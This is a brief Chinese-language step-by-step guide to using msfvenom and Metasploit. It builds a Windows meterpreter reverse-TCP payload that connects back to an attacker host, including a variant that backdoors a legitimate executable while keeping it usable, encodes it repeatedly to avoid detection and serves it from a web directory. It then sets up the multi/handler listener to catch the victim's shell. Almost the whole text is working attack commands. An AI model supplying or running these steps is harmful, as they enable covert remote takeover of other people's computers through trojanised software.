1、kail 下命令行运行
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.4.7.131 lport=4444 -f exe >shell.exe
或者 正常软件加后门(不影响正常软件的使用)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.4.7.131 LPORT=4444 -b '\x00' -e x86/shikata_ga_nai -i 10 -x 软件.exe -f exe -o /var/www/html/软件.exe
2、生成的 exe 复制到window 下,或者覆盖原来的exe
3、kali命令行上输入msfconsole打开metasploit(或者直接打开metasploit)
4、metasploit配置及监听
4.1、 使用加载模块
use exploit/multi/handler
4.2 设置payload
set payload windows/meterpreter/reverse_tcp
4.3 设置监听地址(kail 的地址)
set lhost 10.4.7.131
4、4 设置监听端口
set lport 4444
5、开始监听
run
6、靶机上 运行 exe 文件连接上